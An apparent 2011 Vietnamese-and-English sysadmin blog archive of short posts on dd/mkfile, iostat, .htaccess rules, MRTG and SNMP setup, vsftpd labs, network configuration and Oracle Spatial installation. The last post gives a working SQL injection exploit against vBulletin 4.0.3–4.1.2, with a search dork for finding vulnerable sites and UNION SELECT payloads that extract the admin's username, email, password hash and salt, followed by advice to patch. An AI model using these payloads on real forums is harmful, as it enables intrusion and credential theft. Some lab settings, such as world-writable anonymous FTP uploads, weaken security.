Friday, June 24, 2011

Create a file with mkfile or dd

Now assume you want to create a file with 10M space:
Under Solaris:
root@beisoltest02 / # mkfile 10m disk1.img
root@beisoltest02 / # ls -lh disk1.img -rw——T 1 root root 10M Jun 22 00:41 disk1.img

Under Linux:
[root@beivcs02 downloads]#

Tạo File 10Mb

dd if=/dev/zero of=disk1.img bs=1024k count=10

Tạo file 10GB

dd if=/dev/zero of=disk1.img bs=1024k count=10240


10+0 records in
10+0 records out
10485760 bytes (10 MB) copied, 0.01096 seconds, 957 MB/s
[root@beivcs02 downloads]# ls -lh disk1.img
-rw-r–r– 1 root root 10M Jun 22 00:37 disk1.img

Thursday, June 23, 2011

See Your Disk IO with iostat

A handy tool that is not installed by default on Red Hat / CentOS is iostat. If your application is chugging, and the processor or network isn't maxed out, disk IO may be the bottle-neck. iostat is part of the sysstat package, so go ahead and install it:

# yum -y install sysstat

Run iostat to see your input / output statistics:

# iostat 5 5

Thursday, June 16, 2011

Một số thủ thuật với .htaccess


Bằng việc khai thác tập tin cấu hình .htaccess trên Apache server, bạn có thể thực hiện được rất nhiều việc khác nhau như cấu hình lại file error, viết lại url, ... dưới đây là một số thủ thuật nữa mà bạn có thể sử dụng với .htaccess

1. Chống hotlink:

Hotlink nghĩa là một tập tin của ta được đọc trực tiếp từ trang khác. Thí dụ: bạn có một ảnh JPEG rất đẹp 200KB ở máy chủ của bạn, nhưng người khác lại dùng thẻ để hiển thị hình ảnh này ở trang web của họ. Đây là hành vi ăn cắp băng thông của bạn, vì mọi người xem không ai biêt rằng cái ảnh đó của bạn, và bạn đã mất băng thông một cách vô ích.
Rất may, hầu hết các trình duyệt khi yêu cầu một tập tin đều có gửi kèm một thông số cho biết nó được yêu cầu từ trang web nào. Vậy bạn chỉ cần đơn giản một câu kiểm tra là xong.

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?yoursite\.com.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://your-ip.*$ [NC]
RewriteRule .*\.(jpg|gif)$ http://www.yoursite.com/hotlink.jpg [NC]

Trong đó hotlink.jpg là ảnh sẽ thay thể các ảnh kia (bạn có thể ghi một câu thông báo chẳng hạn vào tấm ảnh đó). Và tất cả ảnh được link đến từ trang khác sẽ không hiện ra, mà được thay bằng ảnh hotlink.jpg. Tất nhiên, bạn có thể sửa lại để ngăn các tập tin khác ngoài GIF và JPG.
Đôi khi, bạn muốn chống hotlink trong thư mục gallery thôi chẳng hạn, thì dòng cuối cần sửa lại thành:

RewriteRule .*gallery.*\.(jpg|gif)$ http://www.yoursite.com/hotlink.jpg [NC]

2. Trang báo lỗi:

Bình thường, khi gặp lỗi, bạn sẽ nhận được một thông báo chán ngắn từ Apache. Tuy nhiên, với .htaccess bạn có thể tuỳ biến trang thông báo này. Thí dụ sau tạo thông báo lỗi tuỳ biến cho các lỗi 403 (cấm truy cập) và 404 (trang không tồn tại), trong đó nội dung file error_forbidden.htm và error_notfound.htm do bạn quyết định, ví dụ như đưa ra một form tìm kiếm nội dung trong trang, cấu hình lại đúng đối số trên trang vv...:

ErrorDocument 403 /error_forbidden.htm
ErrorDocument 404 /error_notfound.htm

3. Chọn trang web theo thời điểm:


Đoạn mã sau đây sẽ hiển thị trang sleep.htm nếu ai đó truy cập vào trang của bạn trong khoảng 1 đến 4 giờ sáng:

RewriteEngine on
RewriteCond %{TIME_HOUR}%{TIME_MIN} >0100
RewriteCond %{TIME_HOUR}%{TIME_MIN} <0400
RewriteRule ^.*$ http://www.yourdomain.com/sleep.htm

4. Nhắc nhở bật cookie:


Bạn bắt buộc người dùng phải chấp nhận cookie, và muốn kiểm tra cookie đã được thiết lập hay chưa. Rất đơn giản, đoạn sau sẽ thay tất cả các ảnh một một tấm ảnh kêu người dùng bất cookie (cookies/enable.gif là hình báo nhắc nhở bật cookie).

RewriteEngine on
RewriteCond %{HTTP_COOKIE} !^.*cookies=true.*$
RewriteRule .*[Jj][Pp][Gg]$|.*[Gg][Ii][Ff]$ /cookies/enable.gif

5. Chặn ip của ai đó:

Đôi khi bạn muốn giới hạn một trang nào đó chỉ cho phép 1 vài người truy cập (như khu vực Admin), hoặc cho tất cả trừ một vài người không được phép truy cập vào (ngăn những ip đang flood). Cả hai trường hợp này có thể giải quyết nhẹ nhàng nhờ .htaccess

5.1. Chỉ cho phép một số ip truy cập

Đầu tiên ta cấm tất cả, sau đó cho phép một số:

order deny,allow
deny from all
allow from 127.0.0.1
allow from 192.168.0.1

Chỉ cho phép ip 127.0.0.1 và 192.168.0.1 truy cập vào trang web (nếu bạn đặt .htaccess ở thư mục gốc). Để cấm thư mục admin, bạn đặt nó vào thư mục admin.

5.2. Cấm một số ip truy cập

order allow,deny
allow from all
deny from 203.113.135.6
deny from 203.162.*

Cấm ip 203.113.135.6 và tất cả các ip bắt đầu bằng 203.162

6. Thay thế trang index:

Thông thường khi truy nhập vào một trang web, Apache sẽ tìm tập tin index.htm(l) hoặc default.htm(l) trả kết quả về cho trình duyệt, bạn có thể dùng .htaccess thay đổi mặc định này.

DirectoryIndex index.php emyeu.htm index.html index.htm

Với dòng lệnh này thì tất cả các tập tin được liệt kê sẽ được tìm theo thứ tự (lần lượt là index.php, emyeu.htm, rồi đến index.html, index.htm) khi có yêu cầu tới thư mục hiện hành, trang nào được tìm thấy đầu tiên sẽ thành trang index của thư mục.
Trong trường hợp một thư mục nào đó không có tập tin index, Apache sẽ hiển thị một danh sách liệt kê những tập tin có trong thư mục đó. Tuy nhiên nếu đây là những tài liệu nhạy cảm, bạn không muốn cho liệt kê nội dung thì có thể làm bằng nhiều cách sau:
Cách đầu tiên là đặt vào đó một tập tin index.html mặc định
Cách khác là không cho hiện nội dung thư mục bằng .htaccess

Options -Indexes

Cách cuối cùng là đặt index mặc định nếu index.html không tìm thấy:

DirectoryIndex index.php index.html index.htm /noindex.html

Trong trường hợp này, bạn tạo tập tin /noindex.html, khi đó nếu Apache không tìm thấy index.*, nó sẽ đọc noindex.html ở thư mục gốc. Nghĩa là bạn luôn có tập tin index.

Cấu hình MRTG trên Centos 5.4



MTRG là phần mềm quản lý băng thông mạng cũng như các tài nguyên hệ thống (Cpu, memory, hdd… ) trên các thiết bị từ xa dựa trên nền giao thức SNMP.

Sau đây là hướng dẫn cấu hỉnh MRTG trên Centos 5.4:


Bước 1: tiến hành quá trình cài đặt mrtg và net-snmp .

yum -y install mrtg net-snmp-utils net-snmp

Bước 2: tiến hành quá trình cấu hình cho snmpd . Tìm files config /etc/snmp/snmpd.conf

Tìm :

com2sec notConfigUser default public

Đổi thành :

#com2sec notConfigUser default public

Tìm :

group notConfigGroup v1 notConfigUser
group notConfigGroup v2c notConfigUser

Đổi thành :

#group notConfigGroup v1 notConfigUser
#group notConfigGroup v2c notConfigUser

Tìm

view systemview included .1.3.6.1.2.1.1
view systemview included .1.3.6.1.2.1.25.1.1

Đổi thành :

#view systemview included .1.3.6.1.2.1.1
#view systemview included .1.3.6.1.2.1.25.1.1

Tìm :

access notConfigGroup “” any noauth exact systemview none none

Đổi thành :

#access notConfigGroup “” any noauth exact systemview none none

Tìm :

#com2sec local localhost COMMUNITY
#com2sec mynetwork NETWORK/24 COMMUNITY

Đổi thành :

com2sec local localhost public
com2sec mynetwork 192.168.1.0/24 public

Tìm :

#group MyRWGroup any local
#group MyROGroup any mynetwork

Đổi thành :

group MyRWGroup any local
group MyROGroup any mynetwork

Tìm :

# view all included .1 80

Đổi thành:

view all included .1 80

Tìm:

#access MyROGroup “” any noauth 0 all none none
#access MyRWGroup “” any noauth 0 all all all

Đổi thành:

access MyROGroup “” any noauth 0 all none none
access MyRWGroup “” any noauth 0 all all all

Tìm :

syslocation Unknow (edit /etc/snmp/snmpd.conf)
syscontact Root (configure /etc/snmp/snmp.local.conf)

Đổi thành:

syslocation Hanoi
syscontact admin

Bước 3 : bật dịch vụ snmpd và kiểm tra

chkconfig snmpd on
service snmpd start

Dùng command :

snmpwalk -v 1 -c public localhost IP-MIB::ipAdEntIfIndex

Nếu hiện ra thông báo như sau thì dịch vụ snmp đã ok .

IP-MIB::ipAdEntIfIndex.192.168.1.100 = INTEGER: 2
IP-MIB::ipAdEntIfIndex.127.0.0.1 = INTEGER: 1

Bước 4 : cấu hình MRTG
• Tạo WorkDir cho files cfg :

cfgmaker –global ‘WorkDir: /var/www/mrtg’ –output /etc/mrtg/mrtg.cfg
public@localhost

• Tạo chỉ mục :

indexmaker –output=/var/www/mrtg/index.html /etc/mrtg/mrtg.cfg

• Chạy cập nhật và tạo graph cho MRTG lần đầu :

env LANG=C /usr/bin/mrtg /etc/mrtg/mrtg.cfg –logging /var/log/mrtg.log

Bước 5 : tạo cron để cho MRTG được cập nhật thường xuyên :

Gõ command tạo crontab

crontab –e

Thêm vào nội dung cho phép MRTG cập nhật định kỳ 5 phút một lần :

*/5 * * * * env LANG=C /usr/bin/mrtg /etc/mrtg/mrtg.cfg –logging /var/log/mrtg.log

Bước 6: bật dịch vụ httpd và cho phép từ bên ngoài truy cập vào để quản lý băng thông:
Chỉnh sửa files /etc/httpd/conf.d/mrtg.conf thành:

Alias /mrtg /var/www/mrtg


Order deny,allow
Allow from all
# Allow from .example.com


Bật và khởi động dịch vụ :

chkconfig httpd on
services httpd start

Bước 7: Truy cập vào MRTG kiểm tra hoạt động

http:///mrtg/index.html

FTP SERVER - VSFTPD

Tải về bài viết: FTP SERVER - VSFTPD.pdf
1. Giới thiệu
- Là 1 dịch vụ dùng để chia sẻ tài nguyên.
- FTP là FTP server chạy trên môi trường Linux.
- VSFTP sẽ phân quyền dựa trên cấu hình và File Permisson.

2. Yêu cầu
Xây dựng DNS cho domain linux106.com sao cho phân giải được record ftp.linux106.com

a. Cài đặt FTP Server
- Kiểm tra gói phần mềm, nếu chưa cài thì cài vào (xem mục cài đặt)
#rpm -qa vsftpd

- Tắt Firewall, SELinux

b. Cấu hình FTP Server - vsftpd
- File cấu hình /etc/vsftpd/vsftpd.conf


3. Các bài Lab

3.1 Lab 1
Cấu hình cho phép anonymous được phép truy cập FTP Server
- Sủa dòng 12 trong file cấu hình với nội dung như sau:
anonymous_enable=YES

- Start dịch vụ vsftpd
#service vsftpd start

- Kiểm tra:
+ dùng trình duyệt explorer trên Windows
+ dòng lệnh: mở CMD, rồi gõ lệnh sau:
ftp ftp.linux106.com
+ lưu ý: thư mục root của ftp là /var/ftp

3.2 Lab 2
Thay đổi thư mục gốc của FTP Server là /data/ftp
- Tạo thư mục
#mkdir /data
#mkdir /data/ftp

- Thêm vào cuối file cấu hình nội dung sau:
anon_root=/data/ftp

- restart lại dịch vụ
#service vsftpd restart

- Kiểm tra bằng trình duyệt explorer hoặc dòng lệnh.

3.3 Lab 3
Cấu hình để anonymous được upload file lên thư mục /upload trên Ftp Server
- Tạo thư mục
#mkdir /data/ftp/upload

- Chỉnh sửa nội dung sau trong tập tin cấu hình:
+ dòng 18
write_enable=YES
+ dòng 27
anon_upload_enable=YES

- restart dịch vụ
#service vsftpd restart

- Cấp quyền cho thư mục /data/ftp/upload
#chmod 757 /data/ftp/upload

- Kiểm tra.

3.4 Lab 4
Cấu hình để anonymous được upload thư mục lên thư mục /upload trên Ftp Server
- Chỉnh sửa nội dung sau trong tập tin cấu hình:
+ dòng 18
write_enable=YES
+ dòng 31
anon_mkdir_write=YES


3.5 Lab 5
Cấu hình để có thể xóa, đổi tên file
- Thêm vào cuối file tập tin cấu hình nội dung sau:
anon_other_write_enable=YES

3.6 Lab 6
Cấu hình sao cho anonymous upload file lên và download được file đó về
- Thêm nội dung sau vào cuối file cấu hình /etc/vsftpd/vsftpd.conf
anon_usmask=022

- Restart dịch vụ
#service vsftpd restart

- Kiểm tra

- Chú ý:
Nếu download về không được thì vào tools -> internet options -> sercurity ->trusted sited ->sites -> add

3.7 Lab 7
Cho phép các user local login vào Ftp Server
- Chỉnh file cấu hình nội dung dòng 15 như sau:
local_enable=YES

- restart dịch vụ
#service vsftpd restart

- Kiểm tra
Tạo user hv1 và hv2 và login vào để kiểm tra.

3.8 Lab 8
Cấm user hv1 login vào Ftp Server
- Chỉnh file cấu hình dòng 115
userlist_enable=YES

- thêm user hv1 vào cuối file
/etc/vsftpd/user_list

- restart dịch vụ
#service vsftpd restart

- kiểm tra
login vào Ftp Server bằng user hv1 để kiểm tra.

3.9 Lab 9
Cấm máy bên cạnh truy xuất FTP Server
- Chỉnh sửa file cấu hình, dòng 116
tcp_wrappers=YES

- thêm nội dung sau vào cuối file /etc/hosts.deny
vsftpd: 192.168.9.107

- restart dịch vụ
#service vsftpd rertart

- Kiểm tra
Truy cập FTP Server từ máy 192.168.9.107 vào máy xem có bị cấm không?

Lệnh gán IP cho interface


Config Network
Lệnh gán IP cho interface ( ở đây interface của tôi là eth0, có thể là eth1 or eth2 …)
Code:
#ifconfig eth0 192.168.1.175 netmask 255.255.255.0
Gán default gateway cho interface
Code:
#route add default gw 192.168.1.246 dev eth0
Ở đây, eth0 sẽ có ip là 192.168.1.175 và có gateway là 192.168.1.246, nhưng có 1 điều lưu ý là các hiệu chỉnh này sẽ mất đi sau khi restart server hay nói đúng hơn là chúng ta restart dịch vị networking.
chính vì thế ta cần phải gán static luôn và file config network
1/ Trong Fedora mở cửa sổ lệnh command
Code:
/etc/network/interfaces
Mở file này ra dùm VIM
Code:
#vim /etc/network/interfaces
Bấm nút insert để vào chế độ write text vào file
thêm dòng này vào này
Code:
iface eth2 inet static address 192.168.100.222 netmask 255.255.255.0 gateway 192.168.100.245
save lại với thao tác, nhấn ESC sau đó gõ : wq
restart dich vụ networking lại để kiểm tra
Code:
#/etc/init.d/networking restart
Show ip của máy lên bằng lện ifconfig

#ifconfig eth0 192.168.1.175 netmask 255.255.255.0
gán ip như thế này chỉ dùng tạm thời, khi restart lại sẽ không còn IP đó. Nếu muốn gán IP tĩnh, gán trực triếp vào card mạng đó luôn

Red Hat/Fedora/CentOS: /etc/sysconfig/network-scripts/ifcfg-device ---device eth0

DEVICE=eth0
USERCTL=no
ONBOOT=yes
BOOTPROTO=dhcp/none
BROADCAST=
NETWORK=
NETMASK=
IPADDR=
Để thiết lập ip có tác dụng cho lần khởi động sau thì bạn phải sửa các file sau:

• Đối với RHEL, Fedora: thêm vào cuối file /etc/sysconfig/network/ifcfg-eth0 các dòng sau:
DEVICE=eth0
BOOTPROTO=none
ONBOOT=yes
TYPE=Ethernet

IPADDR=192.168.1.254
NETMASK=255.255.255.0
GATEWAY=192.168.1.1

(trong CentOS, file chịu trách nhiệm cấu hình mạng là /etc/sysconfig/network-scripts/ifcfg-eth0 Bạn điền thông tin giống hệt như trong Fedora)
Để chỉ định DNS server, vi /etc/resovl.conf và thêm vào dòng:
nameserver 192.168.1.1;


• Đối với Ubuntu: mở file /etc/network/interfaces, thay
auto eth0
iface eth0 inet dhcp
bằng:
iface eth0 inet static
address 192.168.1.10
netmask 255.255.255.0
gateway 192.168.1.1

Sau đó khởi động lại card mạng:
/etc/init.d/networking restart

Wednesday, June 15, 2011

How does one install Oracle Spatial?

How does one install Oracle Spatial?

Oracle Spatial can be installed via the Oracle installer, DBCA or from the command line interface. Look at these examples:

For Oracle 9i and 10g:

SQL> connect SYS as SYSDBA
SQL> @?/md/admin/mdinst.sql


For Oracle 8i:

SQL> REM # Create MDSYS users as part of the ORD (Object Relational Data)
SQL> REM # install script ordisys.sql:
SQL> connect SYS as SYSDBA
SQL> @?/ord/admin/ordisys.sql

SQL> REM # Install MD catalog into the MDSYS user
SQL> connect mdsys/mdsys
SQL> @?/md/admin/catmd.sql

For Oracle 8.0:

SQL> REM # Create user MDSYS with admin option
SQL> connect SYS as SYSDBA
SQL> @?/md/install/mdsysid.sql

SQL> REM # Install MD catalog into the MDSYS user
SQL> connect mdsys/mdsys
SQL> @?/md/admin/catmd.sql


NOTE: Also run catmd.sql after upgrading to a new Oracle release.

Saturday, June 11, 2011

Exploit works on vbulletin version 4.0.3 -> 4.1.2

Download addons firefox: Live HTTP headerds
Chú ý phải tìm từ khóa nào có kết quả hiển thị lên được nhé

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thank my friends from Inj3ct0r Team (1337day.com)

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936